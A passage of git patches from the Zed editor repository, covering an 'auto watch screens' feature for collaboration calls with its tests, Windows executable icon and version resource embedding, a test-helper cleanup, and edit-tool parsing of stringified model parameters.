TestAppContext, + user_b: &mut TestAppContext, + user_c: &mut TestAppContext, +) { + let mut server = TestServer::start(executor.clone()).await; + let setup = setup_auto_watch_test(&mut server, user_a, user_b, user_c).await; + let (workspace_a, user_a) = setup.client_a.build_workspace(&setup.project_a, user_a); + + 
workspace_a.update_in(user_a, |workspace, window, cx| { + workspace.toggle_auto_watch(window, cx); + }); + start_screen_share(user_b).await; + executor.run_until_parked(); + + workspace_a.update(user_a, |workspace, cx| { + assert_active_matches_title(workspace, "user_b's screen", cx); + }); + + workspace_a.update_in(user_a, |workspace, window, cx| { + workspace.toggle_auto_watch(window, cx); + }); + + workspace_a.update(user_a, |workspace, cx| { + assert_active_matches_title(workspace, "user_b's screen", cx); + }); +} + +#[track_caller] +fn assert_active_matches_title(workspace: &Workspace, expected_title: &str, cx: &App) { + let active_item = workspace.active_item(cx).expect("no active item"); + assert_eq!( + active_item.tab_content_text(0, cx), + expected_title, + "expected active item to be '{}'", + expected_title + ); +} + +async fn start_screen_share(cx: &mut TestAppContext) { + let display = TestScreenCaptureSource::new(); + cx.set_screen_capture_sources(vec![display]); + let screen = cx + .update(|cx| cx.screen_capture_sources()) + .await + .unwrap() + .unwrap() + .into_iter() + .next() + .unwrap(); + let active_call = cx.read(ActiveCall::global); + active_call + .update(cx, |call, cx| { + call.room() + .unwrap() + .update(cx, |room, cx| room.share_screen(screen, cx)) + }) + .await + .unwrap(); +} + +fn stop_screen_share(cx: &mut TestAppContext) { + let active_call = cx.read(ActiveCall::global); + active_call + .update(cx, |call, cx| { + call.room() + .unwrap() + .update(cx, |room, cx| room.unshare_screen(true, cx)) + }) + .unwrap(); +} diff --git a/crates/collab/tests/integration/collab_tests.rs b/crates/collab/tests/integration/collab_tests.rs index 5079698a96a1d0..921319487bf4bf 100644 --- a/crates/collab/tests/integration/collab_tests.rs +++ b/crates/collab/tests/integration/collab_tests.rs @@ -3,6 +3,7 @@ use client::ChannelId; use gpui::{Entity, TestAppContext}; mod agent_sharing_tests; +mod auto_watch_tests; mod channel_buffer_tests; mod 
channel_guest_tests; mod channel_tests; diff --git a/crates/collab_ui/Cargo.toml b/crates/collab_ui/Cargo.toml index 920f620e0ea2d4..978af1387cbe77 100644 --- a/crates/collab_ui/Cargo.toml +++ b/crates/collab_ui/Cargo.toml @@ -36,6 +36,7 @@ client.workspace = true collections.workspace = true db.workspace = true editor.workspace = true +feature_flags.workspace = true futures.workspace = true fuzzy.workspace = true gpui.workspace = true diff --git a/crates/collab_ui/src/collab_panel.rs b/crates/collab_ui/src/collab_panel.rs index 908d11cd654f9b..cea3806edb3e01 100644 --- a/crates/collab_ui/src/collab_panel.rs +++ b/crates/collab_ui/src/collab_panel.rs @@ -11,6 +11,7 @@ use collections::{HashMap, HashSet}; use contact_finder::ContactFinder; use db::kvp::KeyValueStore; use editor::{Editor, EditorElement, EditorStyle}; +use feature_flags::{AutoWatchFeatureFlag, FeatureFlagAppExt as _}; use fuzzy::{StringMatch, StringMatchCandidate, match_strings}; use gpui::{ AnyElement, App, AsyncWindowContext, Bounds, ClickEvent, ClipboardItem, DismissEvent, Div, @@ -35,13 +36,13 @@ use theme::ActiveTheme; use theme_settings::ThemeSettings; use ui::{ Avatar, AvatarAvailabilityIndicator, CollabNotification, ContextMenu, CopyButton, Facepile, - HighlightedLabel, IconButtonShape, Indicator, ListHeader, ListItem, Tab, Tooltip, prelude::*, - tooltip_container, + HighlightedLabel, IconButtonShape, Indicator, ListHeader, ListItem, Tab, TintColor, Tooltip, + prelude::*, tooltip_container, }; use util::{ResultExt, TryFutureExt, maybe}; use workspace::{ - CopyRoomId, Deafen, LeaveCall, MultiWorkspace, Mute, OpenChannelNotes, OpenChannelNotesById, - ScreenShare, ShareProject, Workspace, + AutoWatch, CopyRoomId, Deafen, LeaveCall, MultiWorkspace, Mute, OpenChannelNotes, + OpenChannelNotesById, ScreenShare, ShareProject, Workspace, dock::{DockPosition, Panel, PanelEvent}, notifications::{ DetachAndPromptErr, Notification as WorkspaceNotification, NotificationId, NotifyResultExt, @@ -2895,13 
+2896,75 @@ impl CollabPanel { Section::Offline => SharedString::from("Offline"), }; + let auto_watch_state = self + .workspace + .upgrade() + .map_or(AutoWatch::Off, |workspace| { + *workspace.read(cx).auto_watch_state() + }); + let is_auto_watching = auto_watch_state.enabled(); + let button = match section { - Section::ActiveCall => channel_link.map(|channel_link| { - CopyButton::new("copy-channel-link", channel_link) - .visible_on_hover("section-header") - .tooltip_label("Copy Channel Link") - .into_any_element() - }), + Section::ActiveCall => { + let has_auto_watch_flag = cx.has_flag::(); + let show_auto_watch = has_auto_watch_flag && is_auto_watching; + let show_copy = channel_link.is_some(); + + if show_auto_watch || show_copy { + Some( + h_flex() + .when(has_auto_watch_flag, |this| { + this.child( + IconButton::new( + "auto-watch-screens", + if is_auto_watching { + IconName::Eye + } else { + IconName::EyeOff + }, + ) + .icon_size(IconSize::Small) + .toggle_state(is_auto_watching) + .selected_style(match auto_watch_state { + AutoWatch::Paused => { + ButtonStyle::Tinted(TintColor::Warning) + } + _ => ButtonStyle::Tinted(TintColor::Accent), + }) + .when(!is_auto_watching, |this| { + this.visible_on_hover("section-header") + }) + .tooltip(Tooltip::text(match auto_watch_state { + AutoWatch::Paused => { + "Auto Watch Screens (paused while sharing)" + } + AutoWatch::Active { .. 
} => "Stop Auto Watching Screens", + AutoWatch::Off => "Auto Watch Screens", + })) + .on_click(cx.listener( + |this, _, window, cx| { + this.workspace + .update(cx, |workspace, cx| { + workspace.toggle_auto_watch(window, cx) + }) + .ok(); + }, + )), + ) + }) + .when_some(channel_link, |this, channel_link| { + this.child( + CopyButton::new("copy-channel-link", channel_link) + .visible_on_hover("section-header") + .tooltip_label("Copy Channel Link"), + ) + }) + .into_any_element(), + ) + } else { + None + } + } Section::Contacts => Some( IconButton::new("add-contact", IconName::Plus) .icon_size(IconSize::Small) diff --git a/crates/feature_flags/src/flags.rs b/crates/feature_flags/src/flags.rs index b23f8dbc56a7fc..56e3d135d9ee75 100644 --- a/crates/feature_flags/src/flags.rs +++ b/crates/feature_flags/src/flags.rs @@ -91,3 +91,11 @@ impl FeatureFlag for AgentThreadWorktreeLabelFlag { } } register_feature_flag!(AgentThreadWorktreeLabelFlag); + +pub struct AutoWatchFeatureFlag; + +impl FeatureFlag for AutoWatchFeatureFlag { + const NAME: &'static str = "auto-watch-screens"; + type Value = PresenceFlag; +} +register_feature_flag!(AutoWatchFeatureFlag); diff --git a/crates/livekit_client/src/test.rs b/crates/livekit_client/src/test.rs index 4b5efe0aafbe5c..955f92dc19d012 100644 --- a/crates/livekit_client/src/test.rs +++ b/crates/livekit_client/src/test.rs @@ -420,7 +420,80 @@ impl TestServer { Ok(sid) } - pub(crate) async fn unpublish_track(&self, _token: String, _track: &TrackSid) -> Result<()> { + pub(crate) async fn unpublish_track(&self, token: String, track_sid: &TrackSid) -> Result<()> { + let claims = livekit_api::token::validate(&token, &self.secret_key)?; + let identity = ParticipantIdentity(claims.sub.unwrap().to_string()); + let room_name = claims.video.room.unwrap(); + + let mut server_rooms = self.rooms.lock(); + let room = server_rooms + .get_mut(&*room_name) + .with_context(|| format!("room {room_name} does not exist"))?; + + if let 
Some(video_to_unpublish) = room.video_tracks.iter().position(|t| t.sid == *track_sid) + { + let video_to_unpublish = room.video_tracks.remove(video_to_unpublish); + for client_room in room + .client_rooms + .iter() + .filter(|(id, _)| **id != identity) + .map(|(_, room)| room) + { + let track = RemoteTrack::Video(RemoteVideoTrack { + server_track: video_to_unpublish.clone(), + _room: client_room.downgrade(), + }); + let publication = RemoteTrackPublication { + sid: track_sid.clone(), + room: client_room.downgrade(), + track: track.clone(), + }; + let participant = RemoteParticipant { + identity: identity.clone(), + room: client_room.downgrade(), + }; + let event = RoomEvent::TrackUnsubscribed { + track, + publication, + participant, + }; + + client_room.0.lock().updates_tx.blocking_send(event).ok(); + } + } + + if let Some(audio_to_unpublish) = room.audio_tracks.iter().position(|t| t.sid == *track_sid) + { + let audio_to_unpublish = room.audio_tracks.remove(audio_to_unpublish); + for client_room in room + .client_rooms + .iter() + .filter(|(id, _)| **id != identity) + .map(|(_, room)| room) + { + let track = RemoteTrack::Audio(RemoteAudioTrack { + server_track: audio_to_unpublish.clone(), + room: client_room.downgrade(), + }); + let publication = RemoteTrackPublication { + sid: track_sid.clone(), + room: client_room.downgrade(), + track: track.clone(), + }; + let participant = RemoteParticipant { + identity: identity.clone(), + room: client_room.downgrade(), + }; + let event = RoomEvent::TrackUnsubscribed { + track, + publication, + participant, + }; + + client_room.0.lock().updates_tx.blocking_send(event).ok(); + } + } + Ok(()) } diff --git a/crates/workspace/src/workspace.rs b/crates/workspace/src/workspace.rs index b0c5d3cb97df50..45a14fa1a04b97 100644 --- a/crates/workspace/src/workspace.rs +++ b/crates/workspace/src/workspace.rs @@ -1363,6 +1363,7 @@ pub struct Workspace { project: Entity, follower_states: HashMap, last_leaders_by_pane: HashMap, 
CollaboratorId>, + auto_watch: AutoWatch, window_edited: bool, last_window_title: Option, dirty_items: HashMap, @@ -1415,6 +1416,19 @@ pub struct FollowerState { items_by_leader_view_id: HashMap, } +#[derive(Debug, Clone, Copy, PartialEq, Eq)] +pub enum AutoWatch { + Off, + Active { watched_peer: Option }, + Paused, +} + +impl AutoWatch { + pub fn enabled(&self) -> bool { + matches!(self, AutoWatch::Active { .. } | AutoWatch::Paused) + } +} + struct FollowerView { view: Box, location: Option, @@ -1793,6 +1807,7 @@ impl Workspace { project: project.clone(), follower_states: Default::default(), last_leaders_by_pane: Default::default(), + auto_watch: AutoWatch::Off, dispatching_keystrokes: Default::default(), window_edited: false, last_window_title: None, @@ -4783,6 +4798,93 @@ impl Workspace { } } + pub fn auto_watch_state(&self) -> &AutoWatch { + &self.auto_watch + } + + fn next_watched_peer(&self, cx: &App) -> Option { + self.active_call() + .and_then(|call| call.peer_ids_with_video_tracks(cx).first().copied()) + } + + pub fn toggle_auto_watch(&mut self, window: &mut Window, cx: &mut Context) { + if self.auto_watch.enabled() { + self.auto_watch = AutoWatch::Off; + cx.notify(); + return; + } + + let active_pane = self.active_pane.clone(); + self.unfollow_in_pane(&active_pane, window, cx); + + let local_is_sharing = self + .active_call() + .map_or(false, |call| call.is_sharing_screen(cx)); + + if local_is_sharing { + self.auto_watch = AutoWatch::Paused; + } else { + let watched_peer = self.next_watched_peer(cx); + self.auto_watch = AutoWatch::Active { watched_peer }; + + if let Some(peer_id) = watched_peer { + self.open_shared_screen(peer_id, window, cx); + } + } + + cx.notify(); + } + + fn handle_auto_watch_video_tracks_changed( + &mut self, + peer_id: PeerId, + window: &mut Window, + cx: &mut Context, + ) { + let AutoWatch::Active { watched_peer } = self.auto_watch else { + return; + }; + + let peer_is_sharing = self.active_call().map_or(false, |call| { + 
call.peer_ids_with_video_tracks(cx).contains(&peer_id) + }); + let should_watch_peer = peer_is_sharing && watched_peer.is_none(); + let watched_peer_stopped_sharing = watched_peer == Some(peer_id) && !peer_is_sharing; + + if should_watch_peer || watched_peer_stopped_sharing { + let next_watched_peer = if should_watch_peer { + Some(peer_id) + } else { + self.next_watched_peer(cx) + }; + + self.auto_watch = AutoWatch::Active { + watched_peer: next_watched_peer, + }; + + if let Some(next_watched_peer) = next_watched_peer { + self.open_shared_screen(next_watched_peer, window, cx); + } + } + } + + fn handle_auto_watch_local_share_stopped( + &mut self, + window: &mut Window, + cx: &mut Context, + ) { + let AutoWatch::Paused = self.auto_watch else { + return; + }; + + let watched_peer = self.next_watched_peer(cx); + self.auto_watch = AutoWatch::Active { watched_peer }; + + if let Some(peer_id) = watched_peer { + self.open_shared_screen(peer_id, window, cx); + } + } + pub fn activate_item( &mut self, item: &dyn ItemHandle, @@ -6512,9 +6614,21 @@ impl Workspace { cx: &mut Context, ) { match event { - ActiveCallEvent::ParticipantLocationChanged { participant_id } - | ActiveCallEvent::RemoteVideoTracksChanged { participant_id } => { + ActiveCallEvent::ParticipantLocationChanged { participant_id } => { + self.leader_updated(participant_id, window, cx); + } + ActiveCallEvent::RemoteVideoTracksChanged { participant_id } => { self.leader_updated(participant_id, window, cx); + self.handle_auto_watch_video_tracks_changed(*participant_id, window, cx); + } + ActiveCallEvent::LocalScreenShareStarted => { + if let AutoWatch::Active { .. 
} = self.auto_watch { + self.auto_watch = AutoWatch::Paused; + cx.notify(); + } + } + ActiveCallEvent::LocalScreenShareStopped => { + self.handle_auto_watch_local_share_stopped(window, cx); } } } @@ -7879,6 +7993,7 @@ pub trait AnyActiveCall { fn unshare_project(&self, _: Entity, _: &mut App) -> Result<()>; fn remote_participant_for_peer_id(&self, _: PeerId, _: &App) -> Option; fn is_sharing_project(&self, _: &App) -> bool; + fn is_sharing_screen(&self, _: &App) -> bool; fn has_remote_participants(&self, _: &App) -> bool; fn local_participant_is_guest(&self, _: &App) -> bool; fn client(&self, _: &App) -> Arc; @@ -7908,6 +8023,7 @@ pub trait AnyActiveCall { _: &mut Window, _: &mut App, ) -> Option>; + fn peer_ids_with_video_tracks(&self, _: &App) -> Vec; } #[derive(Clone)] @@ -7961,6 +8077,8 @@ pub struct RemoteCollaborator { pub enum ActiveCallEvent { ParticipantLocationChanged { participant_id: PeerId }, RemoteVideoTracksChanged { participant_id: PeerId }, + LocalScreenShareStarted, + LocalScreenShareStopped, } fn leader_border_for_pane( From baf7c0799c39165e1b5172e58bad44d6d687fc3e Mon Sep 17 00:00:00 2001 From: Marshall Bowers Date: Fri, 1 May 2026 19:47:16 +0200 Subject: [PATCH 130/231] client: Remove unused `FakeServer::build_user_store` method (#55444) This PR removes the `build_user_store` method from the `FakeServer`, as it was not used anywhere. 
Release Notes: - N/A --- crates/client/src/test.rs | 23 ++--------------------- 1 file changed, 2 insertions(+), 21 deletions(-) diff --git a/crates/client/src/test.rs b/crates/client/src/test.rs index 00d29fe537cd48..ca7f94e9a40734 100644 --- a/crates/client/src/test.rs +++ b/crates/client/src/test.rs @@ -7,17 +7,16 @@ use cloud_api_client::{ }; use cloud_llm_client::{CurrentUsage, UsageData, UsageLimit}; use futures::{StreamExt, stream::BoxStream}; -use gpui::{AppContext as _, Entity, TestAppContext}; +use gpui::{AppContext as _, TestAppContext}; use http_client::{AsyncBody, Method, Request, http}; use parking_lot::Mutex; use rpc::{ConnectionId, Peer, Receipt, TypedEnvelope, proto}; -use crate::{Client, Connection, Credentials, EstablishConnectionError, UserStore}; +use crate::{Client, Connection, Credentials, EstablishConnectionError}; pub struct FakeServer { peer: Arc, state: Arc>, - user_id: u64, } #[derive(Default)] @@ -38,7 +37,6 @@ impl FakeServer { let server = Self { peer: Peer::new(0), state: Default::default(), - user_id: client_user_id, }; client.http_client().as_fake().replace_handler({ @@ -213,23 +211,6 @@ impl FakeServer { fn connection_id(&self) -> ConnectionId { self.state.lock().connection_id.expect("not connected") } - - pub async fn build_user_store( - &self, - client: Arc, - cx: &mut TestAppContext, - ) -> Entity { - let user_store = cx.new(|cx| UserStore::new(client, cx)); - assert_eq!( - self.receive::() - .await - .unwrap() - .payload - .user_ids, - &[self.user_id] - ); - user_store - } } impl Drop for FakeServer { From ae8cba026b3af9c2c4351fb3a8c7dfcc8228fef5 Mon Sep 17 00:00:00 2001 From: Zyl0812 <128681759+Zyl0812@users.noreply.github.com> Date: Sat, 2 May 2026 06:33:54 +0800 Subject: [PATCH 131/231] Fix Windows icon resource for bin zed.exe (#54738) ## Summary Fixes the missing Windows icon and version resource metadata for the executable installed as `bin\zed.exe`. 
On Windows, the bundling process builds `cli.exe` and installs it as `bin\zed.exe`. The root `Zed.exe` already embeds the Zed Windows icon and version metadata through `crates/zed/build.rs`, but the CLI executable did not embed equivalent Windows resources. As a result, Windows integrations that discover or display Zed through `bin\zed.exe` may show a missing/default application icon. This change adds Windows resource embedding to the `cli` crate and uses the same release-channel icon selection as the main Zed executable. Fixes #51154 ## Testing - Built the Windows CLI executable: ```powershell cargo build --release --package cli --target x86_64-pc-windows-msvc --locked --offline ``` - Verified `target\x86_64-pc-windows-msvc\release\cli.exe` contains: - `FileDescription = Zed` - `ProductName = Zed` - Verified the executable displays the Zed icon in Windows Explorer. - Confirmed the Windows bundling script installs `cli.exe` as `bin\zed.exe`. - Started a full Windows bundle build and confirmed it passed license generation and progressed into executable builds. The local full bundle build could not be completed because the machine is missing the VS Spectre-mitigated C++ libraries. ## Release Notes - N/A ## Notes This change is limited to Windows executable resource metadata for the CLI binary. It does not change Zed runtime behavior. 
--------- Co-authored-by: John Tur --- Cargo.lock | 12 +- Cargo.toml | 1 + crates/auto_update_helper/Cargo.toml | 4 +- crates/auto_update_helper/build.rs | 12 +- crates/cli/Cargo.toml | 3 + crates/cli/build.rs | 8 ++ crates/windows_resources/Cargo.toml | 16 +++ crates/windows_resources/LICENSE-GPL | 1 + .../resources}/manifest.xml | 0 .../src/windows_resources.rs | 125 ++++++++++++++++++ crates/zed/Cargo.toml | 4 +- crates/zed/build.rs | 29 +--- 12 files changed, 173 insertions(+), 42 deletions(-) create mode 100644 crates/windows_resources/Cargo.toml create mode 120000 crates/windows_resources/LICENSE-GPL rename crates/{auto_update_helper => windows_resources/resources}/manifest.xml (100%) create mode 100644 crates/windows_resources/src/windows_resources.rs diff --git a/Cargo.lock b/Cargo.lock index bd5f9f19a5517b..9bda3f999ce560 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -1268,7 +1268,7 @@ dependencies = [ "simplelog", "tempfile", "windows 0.61.3", - "winresource", + "windows_resources", ] [[package]] @@ -2946,6 +2946,7 @@ dependencies = [ "util", "walkdir", "windows 0.61.3", + "windows_resources", ] [[package]] @@ -21421,6 +21422,13 @@ version = "0.53.1" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "1e7ac75179f18232fe9c285163565a57ef8d3c89254a30685b57d83a38d326c2" +[[package]] +name = "windows_resources" +version = "0.1.0" +dependencies = [ + "embed-resource", +] + [[package]] name = "windows_x86_64_gnu" version = "0.42.2" @@ -22516,7 +22524,7 @@ dependencies = [ "web_search_providers", "which_key", "windows 0.61.3", - "winresource", + "windows_resources", "workspace", "zed-reqwest", "zed_actions", diff --git a/Cargo.toml b/Cargo.toml index cd2b8cf54c26b1..b526095e47c5eb 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -225,6 +225,7 @@ members = [ "crates/x_ai", "crates/zed", "crates/zed_actions", + "crates/windows_resources", "crates/zed_credentials_provider", "crates/zed_env_vars", "crates/zeta_prompt", diff --git 
a/crates/auto_update_helper/Cargo.toml b/crates/auto_update_helper/Cargo.toml index aa5bf6ac40b0e1..81c31a63c369bc 100644 --- a/crates/auto_update_helper/Cargo.toml +++ b/crates/auto_update_helper/Cargo.toml @@ -25,8 +25,8 @@ windows.workspace = true [target.'cfg(target_os = "windows")'.dev-dependencies] tempfile.workspace = true -[target.'cfg(target_os = "windows")'.build-dependencies] -winresource = "0.1" +[build-dependencies] +windows_resources = { path = "../windows_resources" } [package.metadata.docs.rs] targets = ["x86_64-pc-windows-msvc"] diff --git a/crates/auto_update_helper/build.rs b/crates/auto_update_helper/build.rs index 2910632c7ff2ff..b91bbcb4bf5d47 100644 --- a/crates/auto_update_helper/build.rs +++ b/crates/auto_update_helper/build.rs @@ -1,15 +1,9 @@ fn main() { #[cfg(target_os = "windows")] { - println!("cargo:rerun-if-changed=manifest.xml"); + println!("cargo:rerun-if-env-changed=RELEASE_CHANNEL"); + println!("cargo:rerun-if-env-changed=GITHUB_RUN_NUMBER"); - let mut res = winresource::WindowsResource::new(); - res.set_manifest_file("manifest.xml"); - res.set_icon("app-icon.ico"); - - if let Err(e) = res.compile() { - eprintln!("{}", e); - std::process::exit(1); - } + windows_resources::compile(true).expect("failed to compile Windows resources"); } } diff --git a/crates/cli/Cargo.toml b/crates/cli/Cargo.toml index cfd807c0356aa2..e8667c608753b9 100644 --- a/crates/cli/Cargo.toml +++ b/crates/cli/Cargo.toml @@ -52,3 +52,6 @@ plist = "1.3" [target.'cfg(target_os = "windows")'.dependencies] windows.workspace = true + +[build-dependencies] +windows_resources = { path = "../windows_resources" } diff --git a/crates/cli/build.rs b/crates/cli/build.rs index a3c4bc643735d0..8bda0576a078db 100644 --- a/crates/cli/build.rs +++ b/crates/cli/build.rs @@ -26,4 +26,12 @@ fn main() { if let Some(build_identifier) = option_env!("GITHUB_RUN_NUMBER") { println!("cargo:rustc-env=ZED_BUILD_ID={build_identifier}"); } + + #[cfg(windows)] + { + 
println!("cargo:rerun-if-env-changed=RELEASE_CHANNEL"); + println!("cargo:rerun-if-env-changed=GITHUB_RUN_NUMBER"); + + windows_resources::compile(false).expect("failed to compile Windows resources"); + } } diff --git a/crates/windows_resources/Cargo.toml b/crates/windows_resources/Cargo.toml new file mode 100644 index 00000000000000..4344040660c916 --- /dev/null +++ b/crates/windows_resources/Cargo.toml @@ -0,0 +1,16 @@ +[package] +name = "windows_resources" +version = "0.1.0" +edition.workspace = true +publish.workspace = true +license = "GPL-3.0-or-later" + +[lints] +workspace = true + +[lib] +path = "src/windows_resources.rs" +doctest = false + +[target.'cfg(target_os = "windows")'.dependencies] +embed-resource = "3.0" diff --git a/crates/windows_resources/LICENSE-GPL b/crates/windows_resources/LICENSE-GPL new file mode 120000 index 00000000000000..89e542f750cd38 --- /dev/null +++ b/crates/windows_resources/LICENSE-GPL @@ -0,0 +1 @@ +../../LICENSE-GPL \ No newline at end of file diff --git a/crates/auto_update_helper/manifest.xml b/crates/windows_resources/resources/manifest.xml similarity index 100% rename from crates/auto_update_helper/manifest.xml rename to crates/windows_resources/resources/manifest.xml diff --git a/crates/windows_resources/src/windows_resources.rs b/crates/windows_resources/src/windows_resources.rs new file mode 100644 index 00000000000000..fee3e7368bd600 --- /dev/null +++ b/crates/windows_resources/src/windows_resources.rs @@ -0,0 +1,125 @@ +#![allow( + clippy::disallowed_methods, + reason = "build helper used only from build scripts" +)] +#![cfg(target_os = "windows")] + +use std::process::Command; + +fn git_sha() -> Option { + if let Ok(sha) = std::env::var("ZED_COMMIT_SHA") { + return Some(sha); + } + + Command::new("git") + .args(["rev-parse", "HEAD"]) + .output() + .ok() + .filter(|output| output.status.success()) + .map(|output| String::from_utf8_lossy(&output.stdout).trim().to_string()) +} + +fn product_version() -> String { + let 
commit_sha = git_sha(); + let pkg_version = std::env::var("CARGO_PKG_VERSION").unwrap_or_default(); + let channel = std::env::var("RELEASE_CHANNEL").unwrap_or_else(|_| "dev".into()); + let build_id = std::env::var("GITHUB_RUN_NUMBER").ok(); + + let mut metadata = channel; + if let Some(build_id) = &build_id { + metadata.push('.'); + metadata.push_str(build_id); + } + if let Some(sha) = &commit_sha { + metadata.push('.'); + metadata.push_str(sha); + } + + format!("{pkg_version}+{metadata}") +} + +const ICON_DIR: &str = concat!(env!("CARGO_MANIFEST_DIR"), "/../zed/resources/windows"); +const MANIFEST_PATH: &str = concat!(env!("CARGO_MANIFEST_DIR"), "/resources/manifest.xml"); + +pub fn compile(manifest: bool) -> Result<(), Box> { + let channel = option_env!("RELEASE_CHANNEL").unwrap_or("dev"); + let (icon_filename, product_name) = match channel { + "stable" => ("app-icon.ico", "Zed"), + "preview" => ("app-icon-preview.ico", "Zed Preview"), + "nightly" => ("app-icon-nightly.ico", "Zed Nightly"), + _ => ("app-icon-dev.ico", "Zed Dev"), + }; + let icon = std::path::PathBuf::from(ICON_DIR).join(icon_filename); + let icon_escaped = icon.to_string_lossy().replace('\\', "\\\\"); + + let manifest_line = if manifest { + let escaped = MANIFEST_PATH.replace('\\', "\\\\"); + format!("1 24 \"{escaped}\"") + } else { + String::new() + }; + + let pkg_version = std::env::var("CARGO_PKG_VERSION").unwrap_or_default(); + let product_version = product_version(); + let mut version_parts = pkg_version + .split('.') + .map(|part| part.parse::().unwrap_or(0)) + .chain(std::iter::repeat(0)); + let file_version = format!( + "{},{},{},{}", + version_parts.next().unwrap_or(0), + version_parts.next().unwrap_or(0), + version_parts.next().unwrap_or(0), + version_parts.next().unwrap_or(0), + ); + + let rc_content = format!( + r#"1 ICON "{icon_escaped}" +{manifest_line} + +1 VERSIONINFO +FILEVERSION {file_version} +PRODUCTVERSION {file_version} +FILEFLAGSMASK 0x3fL +FILEFLAGS 0x0L +FILEOS 0x40004L 
+FILETYPE 0x1L +FILESUBTYPE 0x0L +BEGIN + BLOCK "StringFileInfo" + BEGIN + BLOCK "040904b0" + BEGIN + VALUE "FileDescription", "{product_name}\0" + VALUE "FileVersion", "{pkg_version}\0" + VALUE "ProductName", "{product_name}\0" + VALUE "ProductVersion", "{product_version}\0" + VALUE "CompanyName", "Zed Industries, Inc.\0" + VALUE "LegalCopyright", "Copyright 2022 - 2025 Zed Industries, Inc.\0" + END + END + BLOCK "VarFileInfo" + BEGIN + VALUE "Translation", 0x0409, 1200 + END +END +"# + ); + + let out_dir = std::path::PathBuf::from(std::env::var("OUT_DIR")?); + let rc_path = out_dir.join("zed_resources.rc"); + std::fs::write(&rc_path, rc_content)?; + + if let Ok(toolkit_path) = std::env::var("ZED_RC_TOOLKIT_PATH") { + let rc_exe = std::path::Path::new(&toolkit_path).join("rc.exe"); + unsafe { + std::env::set_var("RC", rc_exe); + } + } + + embed_resource::compile(&rc_path, embed_resource::NONE) + .manifest_optional() + .unwrap(); + + Ok(()) +} diff --git a/crates/zed/Cargo.toml b/crates/zed/Cargo.toml index 0374f6ec605651..d8ac8be3369f7f 100644 --- a/crates/zed/Cargo.toml +++ b/crates/zed/Cargo.toml @@ -233,8 +233,8 @@ gpui = { workspace = true, features = [ "windows-manifest", ] } -[target.'cfg(target_os = "windows")'.build-dependencies] -winresource = "0.1" +[build-dependencies] +windows_resources = { path = "../windows_resources" } [target.'cfg(any(target_os = "linux", target_os = "freebsd"))'.dependencies] gpui = { workspace = true, features = [ diff --git a/crates/zed/build.rs b/crates/zed/build.rs index 80bf1d8642e253..b27eba36a8a1dc 100644 --- a/crates/zed/build.rs +++ b/crates/zed/build.rs @@ -202,37 +202,12 @@ fn main() { } } - let release_channel = option_env!("RELEASE_CHANNEL").unwrap_or("dev"); - let icon = match release_channel { - "stable" => "resources/windows/app-icon.ico", - "preview" => "resources/windows/app-icon-preview.ico", - "nightly" => "resources/windows/app-icon-nightly.ico", - "dev" => "resources/windows/app-icon-dev.ico", - _ => 
"resources/windows/app-icon-dev.ico", - }; - let icon = std::path::Path::new(icon); - println!("cargo:rerun-if-env-changed=RELEASE_CHANNEL"); - println!("cargo:rerun-if-changed={}", icon.display()); + println!("cargo:rerun-if-env-changed=GITHUB_RUN_NUMBER"); #[cfg(windows)] { - let mut res = winresource::WindowsResource::new(); - - // Depending on the security applied to the computer, winresource might fail - // fetching the RC path. Therefore, we add a way to explicitly specify the - // toolkit path, allowing winresource to use a valid RC path. - if let Some(explicit_rc_toolkit_path) = std::env::var("ZED_RC_TOOLKIT_PATH").ok() { - res.set_toolkit_path(explicit_rc_toolkit_path.as_str()); - } - res.set_icon(icon.to_str().unwrap()); - res.set("FileDescription", "Zed"); - res.set("ProductName", "Zed"); - - if let Err(e) = res.compile() { - eprintln!("{}", e); - std::process::exit(1); - } + windows_resources::compile(false).expect("failed to compile Windows resources"); } } From efc90bba32d5821fbdafb763238b186c8fb1d98c Mon Sep 17 00:00:00 2001 From: Agus Zubiaga Date: Sat, 2 May 2026 18:11:10 +0200 Subject: [PATCH 132/231] edit tool: Support stringified `mode` parameter (#55498) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - N/A --- .../src/tools/streaming_edit_file_tool.rs | 106 ++++++++++++++---- 1 file changed, 83 insertions(+), 23 deletions(-) diff --git a/crates/agent/src/tools/streaming_edit_file_tool.rs b/crates/agent/src/tools/streaming_edit_file_tool.rs index 5f6d51ee2bb5c1..4cd08b2311a2ef 100644 --- a/crates/agent/src/tools/streaming_edit_file_tool.rs +++ 
b/crates/agent/src/tools/streaming_edit_file_tool.rs @@ -84,6 +84,7 @@ pub struct StreamingEditFileToolInput { /// - 'edit': Make granular edits to an existing file. Requires 'edits' field. /// /// When a file already exists or you just created it, prefer editing it as opposed to recreating it from scratch. + #[serde(deserialize_with = "deserialize_maybe_stringified")] pub mode: StreamingEditFileMode, /// The complete content for the new file (required for 'write' mode). @@ -96,7 +97,7 @@ pub struct StreamingEditFileToolInput { #[serde( default, skip_serializing_if = "Option::is_none", - deserialize_with = "deserialize_optional_vec_or_json_string" + deserialize_with = "deserialize_maybe_stringified" )] pub edits: Option>, } @@ -133,11 +134,11 @@ struct StreamingEditFileToolPartialInput { display_description: Option, #[serde(default)] path: Option, - #[serde(default)] + #[serde(default, deserialize_with = "deserialize_maybe_stringified")] mode: Option, #[serde(default)] content: Option, - #[serde(default, deserialize_with = "deserialize_optional_vec_or_json_string")] + #[serde(default, deserialize_with = "deserialize_maybe_stringified")] edits: Option>, } @@ -149,30 +150,23 @@ pub struct PartialEdit { pub new_text: Option, } -/// Sometimes the model responds with a stringified JSON array of edits (`"[...]"`) instead of a regular array (`[...]`) -fn deserialize_optional_vec_or_json_string<'de, T, D>( - deserializer: D, -) -> Result>, D::Error> +#[derive(Deserialize)] +#[serde(untagged)] +enum ValueOrJsonString { + Value(T), + String(String), +} + +fn deserialize_maybe_stringified<'de, T, D>(deserializer: D) -> Result where T: DeserializeOwned, D: Deserializer<'de>, { - #[derive(Deserialize)] - #[serde(untagged)] - enum VecOrJsonString { - Vec(Vec), - String(String), - } - - let value = Option::>::deserialize(deserializer)?; - match value { - None => Ok(None), - Some(VecOrJsonString::Vec(items)) => Ok(Some(items)), - 